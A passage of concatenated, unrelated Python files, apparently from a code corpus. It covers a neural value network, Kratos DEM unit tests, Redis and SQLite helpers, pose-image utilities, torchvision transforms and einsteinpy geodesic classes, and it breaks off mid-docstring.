self.theta = self.state[:, 8].reshape(-1, 1)
self.px1 = self.state[:, 9].reshape(-1, 1)
self.py1 = self.state[:, 10].reshape(-1, 1)
self.vx1 = self.state[:, 11].reshape(-1, 1)
self.vy1 = self.state[:, 12].reshape(-1, 1)
self.radius1 = self.state[:, 13].reshape(-1, 1)
class ValueNetwork(nn.Module):
def __init__(self, state_dim, fc_layers, kinematic, reparametrization=True):
super(ValueNetwork, self).__init__()
self.reparametrization = reparametrization
if reparametrization:
state_dim = 15
self.kinematic = kinematic
self.value_network = nn.Sequential(nn.Linear(state_dim, fc_layers[0]), nn.ReLU(),
nn.Linear(fc_layers[0], fc_layers[1]), nn.ReLU(),
nn.Linear(fc_layers[1], fc_layers[2]), nn.ReLU(),
nn.Linear(fc_layers[2], 1))
def rotate(self, state, device):
# first translate the coordinate then rotate around the origin
# 'px', 'py', 'vx', 'vy', 'radius', 'pgx', 'pgy', 'v_pref', 'theta', 'px1', 'py1', 'vx1', 'vy1', 'radius1'
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13
state = IndexTranslator(state.cpu().numpy())
dx = state.pgx - state.px
dy = state.pgy - state.py
rot = np.arctan2(state.pgy-state.py, state.pgx-state.px)
dg = np.linalg.norm(np.concatenate([dx, dy], axis=1), axis=1, keepdims=True)
v_pref = state.v_pref
vx = state.vx * np.cos(rot) + state.vy * np.sin(rot)
vy = state.vy * np.cos(rot) - state.vx * np.sin(rot)
radius = state.radius
if self.kinematic:
theta = state.theta - rot
else:
theta = state.theta
vx1 = state.vx1 * np.cos(rot) + state.vy1 * np.sin(rot)
vy1 = state.vy1 * np.cos(rot) - state.vx1 * np.sin(rot)
px1 = (state.px1 - state.px) * np.cos(rot) + (state.py1 - state.py) * np.sin(rot)
py1 = (state.py1 - state.py) * np.cos(rot) - (state.px1 - state.px) * np.sin(rot)
radius1 = state.radius1
radius_sum = radius + radius1
cos_theta = np.cos(theta)
sin_theta = np.sin(theta)
da = np.linalg.norm(np.concatenate([state.px - state.px1, state.py - state.py1], axis=1), axis=1, keepdims=True)
new_state = np.concatenate([dg, v_pref, vx, vy, radius, theta, vx1, vy1, px1, py1,
radius1, radius_sum, cos_theta, sin_theta, da], axis=1)
return torch.Tensor(new_state).to(device)
def forward(self, state, device):
if self.reparametrization:
state = self.rotate(state, device)
        value = self.value_network(state)
return value
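# Hedged smoke test: the batch size, layer widths and random 14-column state
# below are illustrative only (columns follow the index comment in rotate()).
if __name__ == "__main__":
    net = ValueNetwork(state_dim=14, fc_layers=[64, 64, 32], kinematic=False)
    state = torch.rand(5, 14)
    value = net(state, torch.device("cpu"))
    print(value.shape)  # torch.Size([5, 1])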
|
61073
|
import os
import KratosMultiphysics
from KratosMultiphysics import Logger
Logger.GetDefaultOutput().SetSeverity(Logger.Severity.WARNING)
import KratosMultiphysics.KratosUnittest as KratosUnittest
import KratosMultiphysics.DEMApplication.DEM_analysis_stage
import numpy as np
import auxiliary_functions_for_tests
this_working_dir_backup = os.getcwd()
def GetFilePath(fileName):
return os.path.join(os.path.dirname(os.path.realpath(__file__)), fileName)
class DEM3D_SearchToleranceMain(KratosMultiphysics.DEMApplication.DEM_analysis_stage.DEMAnalysisStage, KratosUnittest.TestCase):
def Initialize(self):
super().Initialize()
for node in self.spheres_model_part.Nodes:
self.initial_normal_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Z)
@classmethod
def GetMainPath(self):
return os.path.join(os.path.dirname(os.path.realpath(__file__)), "test_search_tolerance")
def GetProblemNameWithPath(self):
return os.path.join(self.main_path, self.DEM_parameters["problem_name"].GetString())
def FinalizeSolutionStep(self):
super().FinalizeSolutionStep()
for node in self.spheres_model_part.Nodes:
#reference data with freq=1 searchtolerance=0.0
if node.Id == 2:
tol = 1.0e-15
if np.isclose(self.time, 0.02, rtol=0.0, atol=1e-06):
y_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)
print(self.time, y_vel)
y_vel_ref = -5.86502139707038
self.assertAlmostEqual(y_vel, y_vel_ref, delta=tol)
if np.isclose(self.time, 0.115, rtol=0.0, atol=1e-06):
y_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)
print(self.time, y_vel)
y_vel_ref = -3.3859516373258987
self.assertAlmostEqual(y_vel, y_vel_ref, delta=tol)
if np.isclose(self.time, 0.22, rtol=0.0, atol=1e-06):
y_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)
print(self.time, y_vel)
y_vel_ref = -0.5929799879392164
self.assertAlmostEqual(y_vel, y_vel_ref, delta=tol)
def Finalize(self):
self.procedures.RemoveFoldersWithResults(str(self.main_path), str(self.problem_name), '')
super().Finalize()
class DEM3D_SearchTolerance1(DEM3D_SearchToleranceMain):
def FinalizeSolutionStep(self):
KratosMultiphysics.DEMApplication.DEM_analysis_stage.DEMAnalysisStage.FinalizeSolutionStep(self)
for node in self.spheres_model_part.Nodes:
if node.Id == 2:
tol = 1.0e-15
if np.isclose(self.time, 0.02, rtol=0.0, atol=1e-06):
y_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)
print(self.time, y_vel)
y_vel_ref = -5.8654458179811835
self.assertAlmostEqual(y_vel, y_vel_ref, delta=tol)
if np.isclose(self.time, 0.115, rtol=0.0, atol=1e-06):
y_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)
print(self.time, y_vel)
y_vel_ref = -3.3861319639727263
self.assertAlmostEqual(y_vel, y_vel_ref, delta=tol)
if np.isclose(self.time, 0.22, rtol=0.0, atol=1e-06):
y_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)
print(self.time, y_vel)
y_vel_ref = -0.594495289987086
self.assertAlmostEqual(y_vel, y_vel_ref, delta=tol)
class DEM3D_SearchTolerance2(DEM3D_SearchToleranceMain):
def FinalizeSolutionStep(self):
KratosMultiphysics.DEMApplication.DEM_analysis_stage.DEMAnalysisStage.FinalizeSolutionStep(self)
for node in self.spheres_model_part.Nodes:
if node.Id == 2:
tol = 1.0e-15
if np.isclose(self.time, 0.02, rtol=0.0, atol=1e-06):
y_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)
print(self.time, y_vel)
y_vel_ref = -5.865445816566027
self.assertAlmostEqual(y_vel, y_vel_ref, delta=tol)
if np.isclose(self.time, 0.115, rtol=0.0, atol=1e-06):
y_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)
print(self.time, y_vel)
y_vel_ref = -3.386128017385994
self.assertAlmostEqual(y_vel, y_vel_ref, delta=tol)
if np.isclose(self.time, 0.22, rtol=0.0, atol=1e-06):
y_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)
print(self.time, y_vel)
y_vel_ref = -0.5941551772701182
self.assertAlmostEqual(y_vel, y_vel_ref, delta=tol)
class DEM3D_SearchTolerance3(DEM3D_SearchToleranceMain):
def FinalizeSolutionStep(self):
KratosMultiphysics.DEMApplication.DEM_analysis_stage.DEMAnalysisStage.FinalizeSolutionStep(self)
for node in self.spheres_model_part.Nodes:
if node.Id == 2:
tol = 1.0e-15
if np.isclose(self.time, 0.02, rtol=0.0, atol=1e-06):
y_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)
print(self.time, y_vel)
y_vel_ref = -5.86502139707038
self.assertAlmostEqual(y_vel, y_vel_ref, delta=tol)
if np.isclose(self.time, 0.115, rtol=0.0, atol=1e-06):
y_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)
print(self.time, y_vel)
y_vel_ref = -3.3859516373258987
self.assertAlmostEqual(y_vel, y_vel_ref, delta=tol)
if np.isclose(self.time, 0.22, rtol=0.0, atol=1e-06):
y_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)
print(self.time, y_vel)
y_vel_ref = -0.5929799879392164
self.assertAlmostEqual(y_vel, y_vel_ref, delta=tol)
class TestSearchTolerance(KratosUnittest.TestCase):
@classmethod
def test_SearchA(self):
path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "test_search_tolerance")
parameters_file_name = os.path.join(path, "ProjectParametersDEM.json")
with open(parameters_file_name,'r') as parameter_file:
project_parameters = KratosMultiphysics.Parameters(parameter_file.read())
project_parameters["SearchTolerance"].SetDouble(0.0)
project_parameters["search_tolerance_against_walls"].SetDouble(0.0)
project_parameters["NeighbourSearchFrequency"].SetInt(1)
model = KratosMultiphysics.Model()
auxiliary_functions_for_tests.CreateAndRunStageInSelectedNumberOfOpenMPThreads(DEM3D_SearchToleranceMain, model, project_parameters, auxiliary_functions_for_tests.GetHardcodedNumberOfThreads())
@classmethod
def test_SearchB(self):
path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "test_search_tolerance")
parameters_file_name = os.path.join(path, "ProjectParametersDEM.json")
with open(parameters_file_name,'r') as parameter_file:
project_parameters = KratosMultiphysics.Parameters(parameter_file.read())
project_parameters["SearchTolerance"].SetDouble(0.0)
project_parameters["search_tolerance_against_walls"].SetDouble(0.0)
project_parameters["NeighbourSearchFrequency"].SetInt(10)
model = KratosMultiphysics.Model()
auxiliary_functions_for_tests.CreateAndRunStageInSelectedNumberOfOpenMPThreads(DEM3D_SearchTolerance1, model, project_parameters, auxiliary_functions_for_tests.GetHardcodedNumberOfThreads())
@classmethod
def test_SearchC(self):
path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "test_search_tolerance")
parameters_file_name = os.path.join(path, "ProjectParametersDEM.json")
with open(parameters_file_name,'r') as parameter_file:
project_parameters = KratosMultiphysics.Parameters(parameter_file.read())
project_parameters["SearchTolerance"].SetDouble(1e-04)
project_parameters["search_tolerance_against_walls"].SetDouble(1e-04)
project_parameters["NeighbourSearchFrequency"].SetInt(20)
model = KratosMultiphysics.Model()
auxiliary_functions_for_tests.CreateAndRunStageInSelectedNumberOfOpenMPThreads(DEM3D_SearchTolerance2, model, project_parameters, auxiliary_functions_for_tests.GetHardcodedNumberOfThreads())
@classmethod
def test_SearchD(self):
path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "test_search_tolerance")
parameters_file_name = os.path.join(path, "ProjectParametersDEM.json")
with open(parameters_file_name,'r') as parameter_file:
project_parameters = KratosMultiphysics.Parameters(parameter_file.read())
project_parameters["SearchTolerance"].SetDouble(1e-03)
project_parameters["search_tolerance_against_walls"].SetDouble(1e-03)
project_parameters["NeighbourSearchFrequency"].SetInt(20)
model = KratosMultiphysics.Model()
auxiliary_functions_for_tests.CreateAndRunStageInSelectedNumberOfOpenMPThreads(DEM3D_SearchTolerance3, model, project_parameters, auxiliary_functions_for_tests.GetHardcodedNumberOfThreads())
if __name__ == "__main__":
Logger.GetDefaultOutput().SetSeverity(Logger.Severity.WARNING)
KratosUnittest.main()
|
61094
|
from flexinfer.misc import build_from_cfg, registry
def build_converter(cfg):
return build_from_cfg(cfg, registry, 'converter')
|
61104
|
def redis_key(project_slug, key, *namespaces):
"""
Generates project dependent Redis key
>>> redis_key('a', 'b')
'a:b'
>>> redis_key('a', 'b', 'c', 'd')
'a:c:d:b'
>>> redis_key('a', 1, 'c', None)
'a:c:1'
"""
l = [project_slug]
if namespaces:
l.extend(namespaces)
l.append(key)
    return ':'.join(str(i) for i in l if i)
class RedisMixin:
project_slug = None
@classmethod
def redis_key(cls, key, namespace):
return redis_key(cls.project_slug, key, namespace)
@classmethod
async def redis(cls, request, key, *, value=None, sadd=None, expire=None,
default=None, namespace=None, smembers=False, srem=None,
delete=False, connection=None):
key = cls.redis_key(key, namespace)
async def _redis(cache):
if value:
await cache.set(key, value)
elif delete:
await cache.delete(key)
elif sadd:
if isinstance(sadd, (list, tuple)):
await cache.sadd(key, *sadd)
else:
await cache.sadd(key, sadd)
elif smembers:
v = await cache.smembers(key)
return v or default
elif srem:
return await cache.srem(key, srem)
elif not expire:
return (await cache.get(key)) or default
if expire:
await cache.expire(key, int(expire))
if connection is not None:
return await _redis(connection)
else:
async with request.app.redis.get() as connection:
return await _redis(connection)
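# Hedged sketch with a minimal fake cache so the coroutine can run without a
# real Redis; only get/set are exercised, and the project slug is made up.
if __name__ == '__main__':
    import asyncio

    class _FakeCache:
        def __init__(self):
            self._data = {}
        async def set(self, key, value):
            self._data[key] = value
        async def get(self, key):
            return self._data.get(key)

    class Demo(RedisMixin):
        project_slug = 'demo'

    async def main():
        cache = _FakeCache()
        await Demo.redis(None, 'token', value='abc', namespace='user', connection=cache)
        print(await Demo.redis(None, 'token', namespace='user', connection=cache))  # abc

    asyncio.run(main())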
|
61107
|
from .base_assigner import BaseAssigner
from .max_iou_assigner import MaxIoUAssigner
from .approx_max_iou_assigner import ApproxMaxIoUAssigner
from .assign_result import AssignResult
from .max_iou_assigner_hbb_cy import MaxIoUAssignerCy
from .max_iou_assigner_rbbox import MaxIoUAssignerRbbox
from .approx_max_iou_assigner_cy import ApproxMaxIoUAssignerCy
__all__ = [
'BaseAssigner', 'MaxIoUAssigner', 'ApproxMaxIoUAssigner', 'AssignResult',
'MaxIoUAssignerCy', 'MaxIoUAssignerRbbox','ApproxMaxIoUAssignerCy'
]
|
61114
|
import numpy as np
import scipy
import cv2
def get_pixel_neighbors(height, width):
"""
Estimate the 4 neighbors of every pixel in an image
:param height: image height
:param width: image width
:return: pixel index - neighbor index lists
"""
pix_id = []
neighbor_id = []
for i in range(height):
for j in range(width):
n = []
if i == 0:
n = n + [(i + 1) * width + j]
elif i == height - 1:
n = n + [(i - 1) * width + j]
else:
n = n + [(i + 1) * width + j, (i - 1) * width + j]
if j == 0:
n = n + [i * width + j + 1]
elif j == width - 1:
n = n + [i * width + j - 1]
else:
n = n + [i * width + j + 1, i * width + j - 1]
for k in n:
pix_id.append(i*width+j)
neighbor_id.append(k)
return pix_id, neighbor_id
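# Worked example (for illustration): in a 2x2 image, pixel 0 (row 0, col 0) has
# neighbors 2 (the pixel below) and 1 (the pixel to its right), so the returned
# lists start with pix_id = [0, 0, ...] paired with neighbor_id = [2, 1, ...].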
limps = np.array(
[[0, 1], [1, 2], [2, 3], [3, 4], [1, 5], [5, 6], [6, 7], [1, 11], [11, 12], [12, 13], [1, 8],
[8, 9], [9, 10], [14, 15], [16, 17], [0, 14], [0, 15], [14, 16], [15, 17]])
def get_instance_skeleton_buffer(h, w, poses):
output = np.zeros((h, w, 3), dtype=np.float32) - 1
for i in range(len(poses)):
keypoints = poses[i]
lbl = i
for k in range(limps.shape[0]):
kp1, kp2 = limps[k, :].astype(int)
bone_start = keypoints[kp1, :]
bone_end = keypoints[kp2, :]
bone_start[0] = np.maximum(np.minimum(bone_start[0], w - 1), 0.)
bone_start[1] = np.maximum(np.minimum(bone_start[1], h - 1), 0.)
bone_end[0] = np.maximum(np.minimum(bone_end[0], w - 1), 0.)
bone_end[1] = np.maximum(np.minimum(bone_end[1], h - 1), 0.)
if bone_start[2] > 0.0:
output[int(bone_start[1]), int(bone_start[0])] = 1
cv2.circle(output, (int(bone_start[0]), int(bone_start[1])), 2, (lbl, 0, 0), -1)
if bone_end[2] > 0.0:
output[int(bone_end[1]), int(bone_end[0])] = 1
cv2.circle(output, (int(bone_end[0]), int(bone_end[1])), 2, (lbl, 0, 0), -1)
if bone_start[2] > 0.0 and bone_end[2] > 0.0:
cv2.line(output, (int(bone_start[0]), int(bone_start[1])), (int(bone_end[0]), int(bone_end[1])), (lbl, 0, 0), 1)
return output[:, :, 0]
def get_poseimg_for_opt(sel_pose, poseimg, init_mask, n_bg=50):
h, w = init_mask.shape[:2]
bg_label = 1
output = np.zeros((h, w, 3), dtype=np.float32) - 1
II, JJ = (poseimg > 0).nonzero()
Isel, J_sel = (poseimg == sel_pose).nonzero()
output[II, JJ] = 0
output[Isel, J_sel] = 2
init_mask[Isel, J_sel] = 1
# Sample also from points in the field
init_mask = cv2.dilate(init_mask, np.ones((25, 25), np.uint8), iterations=1)
I_bg, J_bg = (init_mask == 0).nonzero()
rand_index = np.random.permutation(len(I_bg))[:n_bg]
bg_points = np.array([J_bg[rand_index], I_bg[rand_index]]).T
for k in range(bg_points.shape[0]):
cv2.circle(output, (int(bg_points[k, 0]), int(bg_points[k, 1])), 2, (bg_label, 0, 0), -1)
return output[:, :, 0]
def draw_poses_for_optimization(sel_pose, keypoints_list, init_mask, n_bg=50):
h, w = init_mask.shape[:2]
bg_label = 0
output = np.zeros((h, w, 3), dtype=np.float32)-1
for i in range(len(keypoints_list)):
keypoints = keypoints_list[i]
if i == sel_pose:
lbl = 2
else:
lbl = 1
for k in range(limps.shape[0]):
kp1, kp2 = limps[k, :].astype(int)
bone_start = keypoints[kp1, :]
bone_end = keypoints[kp2, :]
bone_start[0] = np.maximum(np.minimum(bone_start[0], w - 1), 0.)
bone_start[1] = np.maximum(np.minimum(bone_start[1], h - 1), 0.)
bone_end[0] = np.maximum(np.minimum(bone_end[0], w - 1), 0.)
bone_end[1] = np.maximum(np.minimum(bone_end[1], h - 1), 0.)
if bone_start[2] > 0.0:
output[int(bone_start[1]), int(bone_start[0])] = 1
cv2.circle(output, (int(bone_start[0]), int(bone_start[1])), 2, (lbl, 0, 0), -1)
if bone_end[2] > 0.0:
output[int(bone_end[1]), int(bone_end[0])] = 1
cv2.circle(output, (int(bone_end[0]), int(bone_end[1])), 2, (lbl, 0, 0), -1)
if bone_start[2] > 0.0 and bone_end[2] > 0.0:
cv2.line(output, (int(bone_start[0]), int(bone_start[1])), (int(bone_end[0]), int(bone_end[1])), (lbl, 0, 0), 1)
# Draw circles for the bg players keypoints
# for k in range(bg_keypoints.shape[0]):
# cv2.circle(output, (int(bg_keypoints[k, 0]), int(bg_keypoints[k, 1])), 2, (bg_keypoint_lable, 0, 0), -1)
# Sample also from points in the field
init_mask = cv2.dilate(init_mask, np.ones((5, 5), np.uint8), iterations=1)
I_bg, J_bg = (init_mask == 0).nonzero()
rand_index = np.random.permutation(len(I_bg))[:n_bg]
bg_points = np.array([J_bg[rand_index], I_bg[rand_index]]).T
for k in range(bg_points.shape[0]):
cv2.circle(output, (int(bg_points[k, 0]), int(bg_points[k, 1])), 2, (bg_label, 0, 0), -1)
return output[:, :, 0]
def set_U(strokes, h, w, dim):
N = h*w
y = np.zeros((N, dim))
U = scipy.sparse.lil_matrix((N, N))
for p in range(strokes.shape[0]):
i = strokes[p, 1]
j = strokes[p, 0]
index = int(i * w + j)
for ii in range(dim):
y[index, ii] = strokes[p, ii+2]
U[index, index] = 1
return U, y
def set_DW(image, edges=None, sigma1=1000., sigma2=0.01):
image = image.astype(float)
h, w = image.shape[0:2]
N = h * w
pixd, neighborid = get_pixel_neighbors(h, w)
i, j = np.unravel_index(pixd, (h, w))
ii, jj = np.unravel_index(neighborid, (h, w))
pix_diff = np.squeeze((image[i, j, :] - image[ii, jj, :]) ** 2)
if len(pix_diff.shape) == 1:
pix_diff = pix_diff[:, np.newaxis]
weight0 = np.exp(-(np.sum(pix_diff, axis=1)) / sigma1)
weight1 = np.exp(-((edges[i, j]) ** 2) / sigma2)
# neighbor_info = np.vstack((pixd, neighborid, weight0)).T
M = len(pixd)
D = scipy.sparse.lil_matrix((M, N))
W = scipy.sparse.lil_matrix((M, M))
p = np.arange(0, M, 1)
D[p, pixd] = 1
D[p, neighborid] = -1
W[p, p] = weight1
return D, W
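# Hedged smoke test for the sparsity helpers above: the tiny random image,
# zero edge map and single stroke are synthetic placeholders.
if __name__ == "__main__":
    h, w = 4, 5
    img = np.random.rand(h, w, 3)
    edges = np.zeros((h, w))
    D, W = set_DW(img, edges=edges)
    strokes = np.array([[1, 2, 0.25, 0.5, 0.75]])  # x=1, y=2, then a 3-dim label
    U, y = set_U(strokes, h, w, dim=3)
    print(D.shape, W.shape, U.shape, y.shape)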
|
61118
|
import sqlite3
import os
DB_SAVES_DIR = 'saves'
class DB:
def __init__(self, name):
self.name = name
self.path = '{}/{}.db'.format(DB_SAVES_DIR, self.name)
if not os.path.isdir(DB_SAVES_DIR):
os.makedirs(DB_SAVES_DIR)
self.conn = sqlite3.connect(self.path)
def save(self):
# Clear the old db.
self.conn.close()
os.remove('saves/{}.db'.format(self.name))
self.conn = sqlite3.connect(self.path)
self.setup()
def query(self, fname, params=None):
with open(fname) as f:
contents = f.read()
result = []
cursor = self.conn.cursor()
for query in contents.split(';'):
if params is None:
cursor.execute(query)
else:
cursor.execute(query, params)
res = cursor.fetchall()
if len(res) > 0:
for row in res:
result.append({})
for i, col in enumerate(cursor.description):
result[-1][col[0]] = row[i]
return result
def execute(self, fname, params=None):
with open(fname) as f:
contents = f.read()
for statement in contents.split(';'):
cursor = self.conn.cursor()
if params is None:
cursor.execute(statement)
else:
cursor.execute(statement, params)
self.conn.commit()
def setup(self):
# Create all the tables
self.execute('db/setup/gen_log.sql')
self.execute('db/setup/nations.sql')
self.execute('db/setup/names.sql')
self.execute('db/setup/name_modifiers.sql')
self.execute('db/setup/name_places.sql')
self.execute('db/setup/relations.sql')
self.execute('db/setup/nation_relationship.sql')
self.execute('db/setup/groups.sql')
self.execute('db/setup/weapons.sql')
self.execute('db/setup/weapon_stats.sql')
self.execute('db/setup/armors.sql')
self.execute('db/setup/equipment_list.sql')
self.execute('db/setup/treaties.sql')
self.execute('db/setup/events.sql')
self.execute('db/setup/event_types.sql')
self.execute('db/setup/event_data.sql')
self.execute('db/setup/cells.sql')
self.execute('db/setup/buildings.sql')
self.conn.commit()
|
61136
|
import unittest
def setUpModule():
print("in module {} - setUpModule()".format(__name__))
def tearDownModule():
print("in module {} - tearDownModule()".format(__name__))
class TextFixtures(unittest.TestCase):
@classmethod
def setUpClass(cls):
print('in class {} - setUpClass()'.format(cls.__name__))
@classmethod
def tearDownClass(cls):
print('in class {} - tearDownClass()'.format(cls.__name__))
def setUp(self):
print('in setup()')
def tearDown(self):
print('in tearDown()')
    def test_1(self):
        print('in test_1()')
    def test_2(self):
        print('in test_2()')
if __name__ == '__main__':
unittest.main()
|
61137
|
import os
import numpy as np
import torch
from torchvision import models, transforms
MODELS = {'densenet121': models.densenet121,
'resnet152': models.resnet152}
DEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
ANALYZERS = ['grad', 'smooth-grad', 'smooth-taylor', 'ig', 'lrp']
IG_BASELINES = ['zero', 'noise']
# ImageNet transform constants
DEFAULT_TRANSFORM = transforms.Compose([
transforms.Resize(256), # resize image to 256X256 pixels
transforms.CenterCrop(224), # crop the image to 224X224 pixels about the center
transforms.ToTensor(), # convert the image to PyTorch Tensor data type
transforms.Normalize( # Normalize by setting the mean and s.d. to specified values
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]
)
])
NORMALIZE_TRANSFORM = transforms.Compose([
transforms.Normalize( # Normalize by setting the mean and s.d. to specified values
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]
)
])
RESIZE_TRANSFORM = transforms.Compose([
transforms.Resize(256), # resize image to 256X256 pixels
transforms.CenterCrop(224), # crop the image to 224X224 pixels about the center
])
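# Undoes the normalization above: Normalize(mean=m, std=s) maps x to (x - m) / s,
# so applying Normalize(mean=-m/s, std=1/s) maps the result back to x.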
INVERSE_TRANSFORM = transforms.Compose([
transforms.Normalize( # Normalize by setting the mean and s.d. to specified values
mean=[-0.485 / 0.229, -0.456 / 0.224, -0.406 / 0.225],
std=[1 / 0.229, 1 / 0.224, 1 / 0.225]
)
])
|
61138
|
import warnings
import numpy as np
from einsteinpy.integrators import GeodesicIntegrator
from .utils import _P, _kerr, _kerrnewman, _sch
class Geodesic:
"""
Base Class for defining Geodesics
Working in Geometrized Units (M-Units),
with :math:`c = G = M = k_e = 1`
"""
def __init__(
self,
metric,
metric_params,
position,
momentum,
time_like=True,
return_cartesian=True,
**kwargs,
):
"""
Constructor
Parameters
----------
metric : str
Name of the metric. Currently, these metrics are supported:
1. Schwarzschild
2. Kerr
3. KerrNewman
metric_params : array_like
Tuple of parameters to pass to the metric
E.g., ``(a,)`` for Kerr
position : array_like
3-Position
4-Position is initialized by taking ``t = 0.0``
momentum : array_like
3-Momentum
4-Momentum is calculated automatically,
considering the value of ``time_like``
time_like : bool, optional
Determines type of Geodesic
``True`` for Time-like geodesics
``False`` for Null-like geodesics
Defaults to ``True``
return_cartesian : bool, optional
Whether to return calculated positions in Cartesian Coordinates
This only affects the coordinates. Momenta are dimensionless
quantities, and are returned in Spherical Polar Coordinates.
Defaults to ``True``
kwargs : dict
Keyword parameters for the Geodesic Integrator
See 'Other Parameters' below.
Other Parameters
----------------
steps : int
Number of integration steps
Defaults to ``50``
delta : float
Initial integration step-size
Defaults to ``0.5``
rtol : float
Relative Tolerance
Defaults to ``1e-2``
atol : float
Absolute Tolerance
Defaults to ``1e-2``
order : int
Integration Order
Defaults to ``2``
omega : float
Coupling between Hamiltonian Flows
Smaller values imply smaller integration error, but too
small values can make the equation of motion non-integrable.
For non-capture trajectories, ``omega = 1.0`` is recommended.
            For trajectories that either lead to a capture or a grazing
            geodesic, a decreased value of ``0.01`` or less is recommended.
Defaults to ``1.0``
suppress_warnings : bool
Whether to suppress warnings during simulation
Warnings are shown for every step, where numerical errors
exceed specified tolerance (controlled by ``rtol`` and ``atol``)
Defaults to ``False``
"""
# Contravariant Metrics, defined so far
_METRICS = {
"Schwarzschild": _sch,
"Kerr": _kerr,
"KerrNewman": _kerrnewman,
}
if metric not in _METRICS:
raise NotImplementedError(
f"'{metric}' is unsupported. Currently, these metrics are supported:\
\n1. Schwarzschild\n2. Kerr\n3. KerrNewman"
)
self.metric_name = metric
self.metric = _METRICS[metric]
self.metric_params = metric_params
if metric == "Schwarzschild":
self.metric_params = (0.0,)
self.position = np.array([0.0, *position])
        self.momentum = _P(
            self.metric, self.metric_params, self.position, momentum, time_like
        )
self.time_like = time_like
self.kind = "Time-like" if time_like else "Null-like"
self.coords = "Cartesian" if return_cartesian else "Spherical Polar"
self._trajectory = self.calculate_trajectory(**kwargs)
def __repr__(self):
return f"""Geodesic Object:(\n\
Type : ({self.kind}),\n\
Metric : ({self.metric_name}),\n\
Metric Parameters : ({self.metric_params}),\n\
Initial 4-Position : ({self.position}),\n\
Initial 4-Momentum : ({self.momentum}),\n\
Trajectory = (\n\
{self.trajectory}\n\
),\n\
Output Position Coordinate System = ({self.coords})\n\
))"""
def __str__(self):
return self.__repr__()
@property
def trajectory(self):
"""
Returns the trajectory of the test particle
"""
return self._trajectory
def calculate_trajectory(self, **kwargs):
"""
Calculate trajectory in spacetime
Parameters
----------
kwargs : dict
Keyword parameters for the Geodesic Integrator
See 'Other Parameters' below.
Returns
-------
~numpy.ndarray
N-element numpy array, containing step count
~numpy.ndarray
Shape-(N, 8) numpy array, containing
(4-Position, 4-Momentum) for each step
Other Parameters
----------------
steps : int
Number of integration steps
Defaults to ``50``
delta : float
Initial integration step-size
Defaults to ``0.5``
rtol : float
Relative Tolerance
Defaults to ``1e-2``
atol : float
Absolute Tolerance
Defaults to ``1e-2``
order : int
Integration Order
Defaults to ``2``
omega : float
Coupling between Hamiltonian Flows
Smaller values imply smaller integration error, but too
small values can make the equation of motion non-integrable.
For non-capture trajectories, ``omega = 1.0`` is recommended.
            For trajectories that either lead to a capture or a grazing
            geodesic, a decreased value of ``0.01`` or less is recommended.
Defaults to ``1.0``
suppress_warnings : bool
Whether to suppress warnings during simulation
Warnings are shown for every step, where numerical errors
exceed specified tolerance (controlled by ``rtol`` and ``atol``)
Defaults to ``False``
"""
g, g_prms = self.metric, self.metric_params
q0, p0 = self.position, self.momentum
tl = self.time_like
N = kwargs.get("steps", 50)
dl = kwargs.get("delta", 0.5)
rtol = kwargs.get("rtol", 1e-2)
atol = kwargs.get("atol", 1e-2)
order = kwargs.get("order", 2)
omega = kwargs.get("omega", 1.0)
sw = kwargs.get("suppress_warnings", False)
steps = np.arange(N)
geodint = GeodesicIntegrator(
metric=g,
metric_params=g_prms,
q0=q0,
p0=p0,
time_like=tl,
steps=N,
delta=dl,
rtol=rtol,
atol=atol,
order=order,
omega=omega,
suppress_warnings=sw,
)
for i in steps:
geodint.step()
vecs = np.array(geodint.results, dtype=float)
q1 = vecs[:, 0]
p1 = vecs[:, 1]
results = np.hstack((q1, p1))
# Ignoring
# q2 = vecs[:, 2]
# p2 = vecs[:, 3]
if self.coords == "Cartesian":
# Converting to Cartesian from Spherical Polar Coordinates
# Note that momenta cannot be converted this way,
# due to ambiguities in the signs of v_r and v_th (velocities)
t, r, th, ph = q1.T
pt, pr, pth, pph = p1.T
x = r * np.sin(th) * np.cos(ph)
y = r * np.sin(th) * np.sin(ph)
z = r * np.cos(th)
cart_results = np.vstack((t, x, y, z, pt, pr, pth, pph)).T
return steps, cart_results
return steps, results
class Nulllike(Geodesic):
"""
Class for defining Null-like Geodesics
"""
def __init__(
self, metric, metric_params, position, momentum, return_cartesian=True, **kwargs
):
"""
Constructor
Parameters
----------
metric : str
Name of the metric. Currently, these metrics are supported:
1. Schwarzschild
2. Kerr
3. KerrNewman
metric_params : array_like
Tuple of parameters to pass to the metric
E.g., ``(a,)`` for Kerr
position : array_like
3-Position
4-Position is initialized by taking ``t = 0.0``
momentum : array_like
3-Momentum
4-Momentum is calculated automatically,
considering the value of ``time_like``
return_cartesian : bool, optional
Whether to return calculated positions in Cartesian Coordinates
            This only affects the coordinates. The momenta are dimensionless
            quantities and are returned in Spherical Polar Coordinates.
Defaults to ``True``
kwargs : dict
Keyword parameters for the Geodesic Integrator
See 'Other Parameters' below.
Other Parameters
----------------
steps : int
Number of integration steps
Defaults to ``50``
delta : float
Initial integration step-size
Defaults to ``0.5``
rtol : float
Relative Tolerance
Defaults to ``1e-2``
atol : float
Absolute Tolerance
Defaults to ``1e-2``
order : int
Integration Order
Defaults to ``2``
omega : float
Coupling between Hamiltonian Flows
Smaller values imply smaller integration error, but too
small values can make the equation of motion non-integrable.
